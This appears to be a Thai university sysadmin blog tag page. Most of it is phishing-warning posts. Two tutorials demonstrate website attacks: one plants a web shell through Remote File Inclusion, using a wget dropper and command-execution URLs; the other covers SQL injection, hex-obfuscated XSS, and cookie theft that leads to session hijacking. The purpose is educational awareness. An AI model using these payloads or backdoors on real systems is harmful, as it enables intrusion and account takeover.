Tag: phishing

  • Spam 22/1/59

    จดหมายหลอกลวง ห้ามคลิก Link ลบทันที

    2016-01-22 12_59_52-PSU __ Webmail

    2016-01-22 13_01_01-Program Manager

  • Spam 20/1/59

    จดหมายหลอกลวง อย่าคลิกเข้าไป

    2016-01-20 15_04_09-PSU __ Webmail

    2016-01-20 15_05_50-Program Manager

  • Spam 14/1/59

    จดหมายหลอกลวง โดยมันหลอกเอารหัสผ่านจากคนในของเราไป แล้วเข้ามาส่งจาก PSU Webmail

    ระบบตรวจสอบพบพฤติกรรมผิดปรกติ และทำการบังคับเปลี่ยนรหัสผ่านผู้ใช้ไปแล้ว 3 ราย ตั้งแต่ 1 นาทีแรกที่ทำการแล้ว

    ที่ยังหลงเหลือ และได้รับอยู่ มักจะมาจาก Mail Group ที่เปิดให้ส่งถึงผู้รับในกลุ่มโดยตรง โดยที่ผู้ดูแลประจำกลุ่มไม่ตรวจสอบก่อนกระจายครับ

    เรียนมาเพื่อทราบ

    2016-01-15 09_32_29-[ServerAdmin] [Fwd_ ตรวจสอบอีเมล์] - kanakorn.h@psu.ac.th - Psu.ac.th Mail

    Email2

  • spam 20150515

    นี่คือจดหมายหลอกลวง อย่าหลงเชื่อ ห้ามคลิก หรือ Reply ให้ลบทิ้งทันทีspam-20150515

  • Spam 20150508

    นี่คือจดหมายหลอกลวง อย่าหลงเชื่อ ห้ามคลิก หรือ Reply ให้ลบทิ้งทันทีScreenshot from 2015-05-08 13:23:47

  • Spam-20150420-01

    หากท่านได้รับ Email ในลักษณะดังภาพต่อไปนี้ … นี่เป็นจดหมายหลอกลวง !!!

    สิ่งที่ต้องทำ !

    • ห้ามคลิกลิงค์ใดๆ: เพราะมันจะนำไปสู่เว็บไซต์หลอกลวงเอาข้อมูลส่วนตัว รหัสผ่าน และข้อมูลทางการเงินได้ หรือ อาจจะถูกฝังโปรแกรมดักจับข้อมูลในเครื่องของท่านได้ โดยไม่มีการเตือน
    • ห้าม Reply, Forward : เพราะท่านกำลังทำให้เกิดการแพร่กระจาย และ ตกเป็นเป้าหมายต่อไปทันที
    • ให้ลบทิ้งทันที

    หากคลิก หรือ พลาดบอกรหัสผ่านไปแล้ว

    • ให้ตั้งรหัสผ่านใหม่ทันที !!! และต้องแตกต่างจากเดิมโดยสิ้นเชิง
    • หาก Reply ไปตอบโต้กับผู้ส่ง ท่านต้องระวังตัวมากขึ้น เพราะจะมีจดหมายหลอกลวงอื่นๆจำนวนมากที่จะวิ่งเข้ามาหาท่าน

    ทางมหาวิทยาลัย จะไม่ส่งจดหมายแจ้งเตือน/สอบถามรหัสผ่านจากท่านเด็ดขาด
    ดูลักษณะ จดหมายหลอกลวงได้ที่นี่ http://sysadmin.psu.ac.th/tag/spamtoday/

    11016090_825810207484219_4181677015922385492_n 11133880_979914218687413_6070345264068726966_o 11168077_10206042289793579_6477794721261486887_n

     

    Screenshot_2015-05-19-10-04-57

  • วิธีตรวจสอบเว็บไซต์ที่โดน Hack #10

    ในบทความนี้ จะพูดถึงช่องโหว่ที่เรียกว่า Remote File Inclusion หรือ RFI [1]

    จาก วิธีตรวจสอบเว็บไซต์ที่โดน Hack #9 ที่พูดถึง ช่องโหว่ประเภท XSS หรือ Cross-site Scripting ซึ่งอาศัยข้อผิดพลาดของการเขียนโปรแกรม ที่ทำให้ Hacker สามารถแทรก JavaScript ซึ่งจะได้ข้อมูลของ Web Browser และสามารถเปิดโอกาศให้ ผู้ใช้ของระบบ สามารถเขียน JavaScript ลงไปใน Database สร้างความเป็นไปได้ในการขโมย Cookie ID ของ Admin

    แต่ RFI เป็นช่องโหว่ ที่เกิดจากการเขียนโค๊ด ที่เปิดให้มีการ Include ไฟล์จากภายนอก จาก Internet ได้ ซึ่ง เปิดโอกาศให้ Hacker สามารถทำได้ตั้งแต่ เรียกไฟล์ /etc/passwd มาดูก็ได้ หรือ แม้แต่เอาไฟล์ Backdoor มาวางไว้ เรียกคำสั่งต่างๆได้เลยทีเดียว

    โปรดพิจารณาตัวอย่างต่อไปนี้

    ไฟล์แรก form.html มีรายละเอียดดังนี้

    <form method="get" action="action.php">
       <select name="COLOR">
          <option value="red.inc.php">red</option>
          <option value="blue.inc.php">blue</option>
       </select>
       <input type="submit">
    </form>

    ให้ผู้ใช้ เลือกสี red หรือ blue แล้วส่งค่าดังกล่าว ผ่านตัวแปร COLOR ไปยัง action.php ผ่านวิธีการ GET

    ไฟล์ที่สอง action.php มีรายละเอียดดังนี้

    <?php
       if (isset( $_GET['COLOR'] ) ){
          include( $_GET['COLOR'] );
       }
    ?>

    โดยหวังว่า จะได้ Include red.inc.php หรือ blue.inc.php ตามที่กำหนดไว้ เช่น

    http://localhost/rfi/action.php?COLOR=red.inc.php

    แต่ เป็นช่องโหว่ ที่ทำให้ Hacker สามารถ แทรกโค๊ดอันตรายเข้ามาได้ ผ่านตัวแปร COLOR ได้

    หาก Hacker ทราบว่ามีช่องโหว่ ก็อาจจะสร้างไฟล์ Backdoor ชื่อ makeremoteshell.php เพื่อให้แทรกผ่านการ include ผ่านตัวแปร COLOR ดังนี้

    <?php
    $output=shell_exec("
        wget http://localhost/rfi/rfi.txt -O /tmp/rfi.php
        find /var/www -user www-data -type d -exec cp /tmp/rfi.php {} \;
        find /var/www -name 'rfi.php'
    ");
    echo nl2br($output);
    ?>

    ซึ่ง จะทำงานผ่าน function shell_exec ซึ่งสามารถเรียกคำสั่งของ Shell Script ได้ โดย ไปดึงไฟล์จาก http://localhost/rfi/rfi.txt (สมมุติว่าเป็น Website ของ Hacker ที่จะเอาไฟล์ Backdoor ไปวางไว้) แล้ว เอาไฟล์ดังกล่าว ไปเก็บ /tmp/rfi.php และจากนั้น ก็ค้นหาว่า มี Directory ใดบ้างที่ Web User ชื่อ www-data เขียนได้ ก็ copy /tmp/rfi.php ไปวาง หลังจากนั้น ก็แสดงผลว่า วางไฟล์ไว้ที่ใดได้บ้าง

    ไฟล์ rfi.txt ที่จะถูกเปลี่ยนเป็น rfi.php นั้น มีรายละเอียดดังนี้

    <?php
    $c = $_GET['c'];
    $output = shell_exec("$c");
    echo "<pre>" . nl2br($output) . "</pre>";
    ?>

    ซึ่ง จะทำให้สามารถ ส่งคำสั่ง ผ่านตัวแปร c ไปให้ Backdoor rfi.php ทำงานได้เลย
    จากนั้น ก็เรียก

    http://localhost/rfi/action.php?COLOR=http://localhost/rfi/makeremoteshell.php

    ผลที่ได้คือ

    rfi01

    เป็นผลให้ เกิดการวาง Backdoor rfi.php ข้างต้นในที่ต่างๆที่ Web User เขียนได้แล้ว จากนั้น Hacker ก็สามารถ เรียกใช้ ด้วย URL ต่อไปนี้ เพื่อส่งคำสั่ง ls -l ได้เลย

    http://localhost/ccpr/images/stories/rfi.php?c=ls -la

    ผลที่ได้คือ

    rfi02

    หรือ แม้แต่ เอา Backdoor อื่่นๆไปวางด้วย URL

    http://localhost/ccpr/images/stories/rfi.php?c=wget http://localhost/rfi/miya187.txt -O /var/www/ccpr/images/stories/miya187.php

    และเรียกใช้ งาน Backdoor อันตรายอย่างนี้ได้เลยทีเดียว

    http://localhost/ccpr/images/stories/miya187.php

    ผลที่ได้คือ

    rfi03

    ซึ่ง อันตรายอย่างยิ่ง

    วิธีการเดียวที่จะป้องกันได้คือ การปิดค่า allow_url_include ของ PHP ดังนี้

    allow_url_include=Off

    ก็ทำให้ PHP สามารถ Include ได้เฉพาะ Path ที่กำหนดเท่านั้น ไม่สามารถเรียกจากภายนอกได้

    ขอให้โชคดี

     Reference

    [1] Wikipedia:File Inclusion Vulnerability <http://en.wikipedia.org/wiki/File_inclusion_vulnerability>

  • วิธีตรวจสอบเว็บไซต์ที่โดน Hack #9

    สวัสดีปีใหม่ ปี 2557 ขอทุกท่านนประสบความสำเร็จในหน้าที่การงาน คิดหวังสิ่งใดก็สมปรารถนา และมีสุขภาพแข็งแรง ปลอดภัยตลอดทั้งปีครับ

    บทความนี้ ขอกล่าวถึงปัญหาสำคัญปัจจุบัน เรียกว่าเป็น Trends ของปีที่ผ่านมาและต่อไปในปีนี้ (2557) ด้วย นั่นคือ เรื่อง Cross Site Scripting หรือ ที่เขียนย่อๆว่า XSS

    XSS นั้น ก็คล้ายๆกับปัญหาเดิมของ SQL Injection เดิม

    SQL Inject คือ Web Form ที่ให้ผู้ใช้ป้อนข้อมูลเข้ามา ไม่ได้มีการกรองข้อมูลให้ดี จึงทำให้ Hacker สามารถ แทรกคำสั่ง SQL เข้ามา เพื่อให้สามารถ Bypass การตรวจสอบได้ เช่น ตัวอย่าง SQL Injection ที่เขียนจาก PHP ที่หน้าที่รับ username และ password เข้ามาตรวจสอบ จากฐานข้อมูล โดยคิดว่า จับคู่ได้ แล้วมีจำนวน มากกว่า 0 ก็แสดงว่า ให้ผ่านได้ ดังนี้

      <?php
      $username=$_POST['username'];
      $password=$_POST['password'];
    
      $host="localhost";
      $dbuser="root";
      $dbpass="123456";
      $dbname="xss";
      $dbtable="user";
    
      $conn = mysql_connect("$host","$dbuser","$dbpass");
      mysql_select_db("$dbname");
      $sql = "SELECT count(*) FROM $dbtable WHERE username='$username' AND password = '$password' ";
    
      $query=mysql_query($sql);
      $result=mysql_fetch_array($query);
      $count=$result[0];
    
      if ( $count > 0 ) {
            echo " Hello $username ";
      } else {
            echo "Login Fail";
      }
    
      echo "<hr>";
      echo "SQL=$sql";
    
      mysql_close($conn);
    ?>

    เมื่อทำการ Login ด้วย Username เป็น admin และ Password  เป็น yyy ซึ่งผิด

    ผลที่ได้ จะประมาณนี้

    แต่หาก ใส่ Password แทนที่จะเป็น

    yyy

    แต่ใส่เป็น

    yyy' or '1'='1

     ผลที่ได้คือ

    จะเห็นได้ว่า  การที่ไม่ตรวจสอบ Escape Character ให้ดี จึงทำให้ Hacker สามารถเข้ามาได้ โดยไม่จำเป็นต้องทราบรหัสผ่านจริงๆ, นี่คือ SQL Injection

    ส่วน XSS นั้น ก็คล้ายๆกัน แต่ แทนที่จะแทรก SQL Statement ก็ ใช้ JavaScript  แทน โดยช่องโหว่มาจากการเขียนโปรแกรมบน Web Server แต่จะส่งผลกระทบต่อ Web Browser เช่น ทำให้เกิดการ Download Malware, การถูกส่งข้อมูลส่วนตัวที่ผู้ใช้กรอกไปให้ Hacker หรือ Hacker สามารถขโมย Session ของ Admin ซึ่งเข้าใช้งาน Web Application ที่มีช่องโหว่นั้นๆได้เลยทีเดียว

    ลักษณะของ XSS [1] มี 2 แบบ

    1. แบบชั่วคราว (Non-Persistent XSS) : เมื่อ Hacker พบช่องโหว่บน Website ใด ก็จะใช้เป็นช่องทางแพร่ Malware/Virus ได้ หรือ ใช้ในการ redirect ผู้ใช้ผ่านไปยัง Phishing Website ได้ โดยใช้วิธีการแทรก JavaScript เข้าไป

    2. แบบฝังตัวถาวร (Persistent XSS) : ใช้ช่องโหว่ เพื่อเขียนข้อมูล ลงไปใน Database ซึ่ง อาจจะเป็นช่องทางในการ ขโมย Session ของ Admin ได้ โดยมักจะเกิดจาก Website ที่เปิดให้มีการสมัคร โดยไม่ตรวจสอบ หรือ ไม่มี Captcha  ทำให้ Hacker แฝงตัวเข้ามา และอาศัยช่องโหว่นี้ วางกับดัก “เผื่อ” Admin พลาดคลิกเข้า ก็อาจจะได้ Session ไป จนสามารถคุมทั้ง Website ได้ สามารถเข้ามาเป็น Admin ได้เลย

    ตัวอย่าง Non-Persistent XSS

    ถ้ามีการเขียน PHP เพื่อรับช้อมูลจากจากผู้ใช้ และ นำมาใช้งานเลย โดยไม่ตรวจสอบ ดังตัวอย่างนี้ (ชื่อ simple.php)

    <?php
    $name = $_GET['name'];
    echo "Welcome $name<br>";
    echo "<a href='http://xssattackexamples.com/'>Click to Download</a>";
    echo "</br>";
    echo "<a href='http://localhost/xss/testxss.html'>BACK</a>";
    ?>

     เช่น ใส่ค่าตัวแปร “name” เป็น “Firstname Lastname” จะได้ผลอย่างนี้

    http://localhost/xss/simple.php?name=Firstname Lastname

    จะเห็นได้ว่า จะได้ข้อความ Welcome Firstname Lastname ตามที่ใส่ในตัวแปร “name” นั่นเอง

    แต่ ถ้าใส่ JavaScript เข้าไป เพื่อให้แสดง Alert ดังนี้

    http://localhost/xss/simple.php?name=guest<script>alert("attacked")</script>

    ก็จะได้ผลดังนี้

    และ ถ้าใส่ JavaScript อีกแบบ ก็สามารถเปลี่ยน Link ที่ “Click to Download” จาก

    http://xssattackexamples.com/

    เป็น

    http://not-real-xssattackexamples.com/

     ด้วย URL ต่อไปนี้

    http://localhost/xss/simple.php?name=<script>window.onload = function() {var link=document.getElementsByTagName("a");link[0].href="http://not-real-xssattackexamples.com/";}</script>

     ก็จะได้ผลดังนี้

    ซึ่ง ถ้าคลิกที่ “Click to Download” แทนที่จะไปยัง http://xssattackexamples.com/ ก็จะไปยัง http://not-real-xssattackexamples.com/  ซึ่งเป็น Phishing Site ได้เลยทีเดียว

    แต่โดยทั่วไปแล้ว Hacker จะไม่ใส่คำสั่งที่อ่านได้ง่ายๆลงไป โดยจะเปลี่ยน Code ดังกล่าวเป็นเลขฐาน 16 แทน ด้วยคำสั่งต่อไปนี้

    echo -n "<script>window.onload = function() {var link=document.getElementsByTagName("a");link[0].href="http://not-real-xssattackexamples.com/";}</script>" | hexdump -v -e '/1 " %02.2x"' | sed -e 's/ /%/g'

    ผลที่ได้คือ

     %3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f%6e%6c%6f%61%64%20%3d%20%66%75%6e%63%74%69%6f%6e%28%29%20%7b%76%61%72%20%6c%69%6e%6b%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%61%29%3b%6c%69%6e%6b%5b%30%5d%2e%68%72%65%66%3d%68%74%74%70%3a%2f%2f%6e%6f%74%2d%72%65%61%6c%2d%78%73%73%61%74%74%61%63%6b%65%78%61%6d%70%6c%65%73%2e%63%6f%6d%2f%3b%7d%3c%2f%73%63%72%69%70%74%3e

     และ ใช้ URL ต่อไปนี้ เพื่อไม่ให้ผู้ใช้ และ Admin ตรวจสอบได้ง่าย

    http://localhost/xss/simple.php?name=%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f%6e%6c%6f%61%64%20%3d%20%66%75%6e%63%74%69%6f%6e%28%29%20%7b%76%61%72%20%6c%69%6e%6b%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%22%61%22%29%3b%6c%69%6e%6b%5b%30%5d%2e%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%61%74%74%61%63%6b%65%72%2d%73%69%74%65%2e%63%6f%6d%2f%22%3b%7d%3c%2f%73%63%72%69%70%74%3e

    ตัวอย่าง Persistent XSS

    ถ้ามีการเขียน PHP ซึ่งประกอบไปด้วย login.php และ home.php โดยเก็บข้อมูลไว้ใน MySQL ใน Database ‘xss’ และตารางชื่อ ‘user’  ซึ่งมี ผู้ใช้ชื่อ admin เป็นผู้มีสิทธิ์สูงสุด สามารถเห็นรายละเอียดผู้ใช้อื่นๆได้ แต่ ถ้า Login ด้วยผู้ใช้ทั่วไป เช่น user01 ก็จะทำได้แค่ เปลี่ยน Display Name ของตัวเอง … และปัญหาอยู่ตรงที่ การเปิดให้ผู้ใช้ ใส่ Display Name ได้โดยไม่กรองข้อมูล ทำให้ Hacker สามารถ ฝัง JavaScript เข้ามาได้ ดังตัวอย่างต่อไปนี้ (Code ที่เห็น มาจาก [1] ซึ่งต่อกับฐานข้อมูล PostgreSQL ซึ่งผม ปรับเป็น MySQL)

     login.php มีหน้าตาอย่างนี้

    <?php
    if ($_POST[username] == "" ) {
    ?>
    <form method=POST action=login.php>
    <H1>Login</H1>
    Username : <input type=text name=username></br>
    Password : <input type=password name=password></br>
    <input type=submit value="Login"><input type=reset>
    </form>
    <?php
    } else {
    ?>
    <?php
    $Host= 'localhost';
    $Dbname= 'xss';
    $User= 'root';
    $Password= '123456';
    $table = 'user';
    $conn=mysql_connect("$Host","$User","$Password");
    mysql_select_db($Dbname);
    $sql="SELECT username,password from $table where username='".$_POST['username']."';";
    //echo $sql;
    $query=mysql_query($sql);
    $result=mysql_fetch_array($query);
    /*
    if (!($result=mysql_fetch_array($query))) {
     echo "User/Password Failed";
     exit(0);
    } ;
    */
    $password = $_POST['password'];
    $username = $result['username'];
    if($password != $result['password']) {
    echo "Login failed";
    }
    else {
    # Start the session
    echo "$username:$password";
    session_start();
    $_SESSION['USER_NAME'] = $username;
    echo "<head> <meta http-equiv=\"Refresh\" content=\"0;url=home.php\" > </head>";
    }
    ?>
    <?php
    } // End if of a form
    ?>

    และ home.php มีหน้าตาอย่างนี้

    <?php
    session_start();
    if(!$_SESSION['USER_NAME']) {
    echo "Need to login";
    }
    else {
    
    $Host= 'localhost';
    $Dbname= 'xss';
    $User= 'root';
    $Password= '123456';
    $table = 'user';
    
    $conn=mysql_connect("$Host","$User","$Password");
    mysql_select_db($Dbname);
    
    $sql="SELECT username,password from $table where username='".$_POST['username']."';";
    
    $query=mysql_query($sql);
    
    $result=mysql_fetch_array($query);
    
    if($_SERVER['REQUEST_METHOD'] == "POST") {
     $sql2="update $table set display_name='".$_POST['disp_name']."' where username='".$_SESSION['USER_NAME']."';";
     $query=mysql_query($sql2);
     echo "Update Success";
    }
    else {
     if(strcmp($_SESSION['USER_NAME'],'admin')==0) {
      echo "Welcome admin<br><hr>";
      echo "List of user's are<br>";
      $sql = "select display_name from $table where username!='admin'";
      $query= mysql_query($sql);
      while($result = mysql_fetch_array($query)) {
        echo "$result[display_name]<br>";
      }
    }
    else {
     echo "<form name=\"tgs\" id=\"tgs\" method=\"post\" action=\"home.php\">";
     echo "Update display name:<input type=\"text\" id=\"disp_name\" name=\"disp_name\" value=\"\">";
     echo "<input type=\"submit\" value=\"Update\">";
    }
    }
    }
    ?>
    </br>
    <a href=login.php>Go to Login</a></br>
    <a href=home.php>Go to Home</a></br>

    เมื่อ Admin ทำการ Login

    เมื่อใส่รหัสผ่าน ถูกต้อง จะส่งไปยัง home.php ซึ่งจะได้ผลอย่างนี้ สังเกตว่า ในหน้า Admin สามารถเห็นรายชื่อของผู้ใช้ทั้งหมดได้  หนึ่งในนั้นคือ user01

    ต่อ สมมุติ user01 เป็น Hacker เขาก็จะ Login อย่างนี้

    และที่หน้า home.php ของ user01 จะได้หน้าตาอย่างนี้

    ซึ่ง user01 จะสามารถ แก้ไข Display Name จาก “User01” เป็น

     <a href=# onclick=\"document.location=\'http://localhost/xss/xss.php?c=\'+escape\(document.cookie\)\;\">User01</a>

     และกดปุ่ม Update จะได้ผลดังนี้

    เพื่อให้ เมื่อ admin เข้ามาในหน้า home.php และเห็นชื่อของ User01 เป็น Link ดังนี้

    ถ้า admin เห็น และลองคลิกดู ก็จะทำให้ ส่งหมายเลข cookie ของ admin ไปยัง http://localhost/xss/xss.php โดยส่งผ่านตัวแปร c เพื่อเก็บข้อมูลเอาไว้ (แต่ในที่นี้ จะทำเป็นการแสดงผลออกมาแทน) ดังนี้

    ซึ่งจะพบว่า Cookie ID ของ admin ณ ขณะนั้นคือ iveovmj2eoghs02of2u7492k33

     สมมุติว่า Hacker ที่เฝ้าอยู่ พอรู้ว่า Admin คลิกแล้ว ก็จะเปิดหน้า home.php ซึ่งได้ผลอย่างนี้

     

    ใน Firefox จะมีเครื่องมือ คือ Web Developer Toolbar ซึ่งจะสามารถแก้ไขค่า Session ได้ โดยไปที่เมนู

     Tools > Web Developer > Developer Toolbar

    หรือกดปุด Shift-F2 ก็ได้

    จะปรากฏแถบสีดำ ด้านล่าง ให้ใส่คำสั่ง

    cookie list

    จะได้ผลอย่างนี้

     ต่อไป Hacker จะคลิกปุ่ม Edit เพื่อใส่ Cookie ID : iveovmj2eoghs02of2u7492k33 แทน k32vd7a6a44dpomo87i89vube6 ด้วยคำสั่งนี้

     cookie set PHPSESSID iveovmj2eoghs02of2u7492k33

    จากนั้นกดปุ่ม Enter เพื่อ สั่งเปลี่ยน Cookie ID และกดปุ่ม F5 เพื่อ Refresh หน้าจอ

    ผลที่ได้คือ Hacker สามารถ เข้าถึงหน้าจอของ Admin ได้ ดังนี้

    จากนั้น Hacker ก็จะสามารถ ทำงานทุกอย่างที่ Admin สามารถทำได้แล้วครับ

     ส่วนวิธีการตรวจสอบ และป้องกัน ขอติดไว้ก่อน จะมาเล่าให้ฟังต่อไป
    ลองอ่านพลางๆครับ

    https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29
    https://www.acunetix.com/websitesecurity/xss/
    http://www.riyazwalikar.com/2010/06/multiple-joomla-xss-vulnerabilities-cve.html
    https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
    http://msdn.microsoft.com/en-us/library/aa973813.aspx

    ขอให้โชคดี

    Reference

    [1] Ramesh Natarajan. “XSS Attack Examples (Cross-Site Scripting Attacks) – The Geek Stuff.” 2012. 1 Jan. 2014 <http://www.thegeekstuff.com/2012/02/xss-attack-examples/>

  • จดหมายหลอกลวง 2013-08-07

    วันนี้ 7 สิงหาคม 2556 มีจดหมายหลอกลวงหลุดเข้ามาในระบบ
    โดยผ่าน ผู้ใช้ของมหาวิทยาลัย 3 คน ซึ่งโดนหลอกเอารหัสผ่านไปก่อนหน้านี้
    ซึ่ง ทั้งหมด ถูกระงับการใช้งาน PSU Email ชั่วคราวไปแล้ว

    โดยจะมีหน้าตาจดหมาย เป็นภาษาไทย แต่อ่านแล้วสับสน เพราะใช้ Google Translate แปล เพื่อหลอกคนไทยโดยเฉพาะ เนื้อหาประมาณนี้

    spam-20130807

     

    โดยหวังให้ผู้ที่โดนหลอก คลิก Link ใน Email ซึ่งจะได้พบหน้า Website นี้

    spam-20130807-2

     

    เมื่อมีผู้หลงเชื่อ กรอกข้อมูลลงไป โดยเฉพาะ Username และ Password ก็ทำให้ผู้ร้ายสามารถเข้ามาใช้ PSU Webmail ของผู้นั้น เป็นฐานในการโจมตีผู้อื่นต่อไป

    ผลกระทบที่ผู้ถูกหลอกจะได้รับ

    1. จะมีจดหมายจากตัวเอง ส่งไปหาคนทั่วโลก นับแสนคน สร้างความเดือนร้อนรำคาญ

    2. ผู้ร้าย จะทำการเปลี่ยนข้อมูลส่วนตัวของผู้นั้น เมื่อผู้รับตอบกลับมา จะไม่กลับมายัง Email ของคนนั้นอีกเลย แต่จะส่งไปให้ผู้ร้ายแทน

    หากมีข้อมูลทางการเงิน ก็อาจทำให้สูญทรัพย์สินได้

    3. หากมีการส่ง Email ขยะออกไปมาก จะทำให้ ทั่วโลกปิดกั้นการรับข้อมูลจากมหาวิทยาลัย และทำให้เกิดความเสียหายกับทั้งมหาวิทยาลัยได้

     

    ทางมหาวิทยาลัย จะไม่มีจดหมายลักษณะดังกล่าวไปแจ้งผู้ใช้ ** เด็ดขาด **

    กรุณาอ่านเพิ่มเติม เกี่ยวกับกลลวงต่างๆได้ที่

    http://share.psu.ac.th/blog/cyber007/25717

    หากท่านใดได้รับ กรุณาลบทิ้งทันที อย่าได้ลองคลิก Link เด็ดขาด เพราะอาจจะมีการฝัง Script บางอย่าง เพื่อฝังไว้ในเครื่องของท่านก็เป็นได้

     

    จึงเรียนมาเพื่อทราบ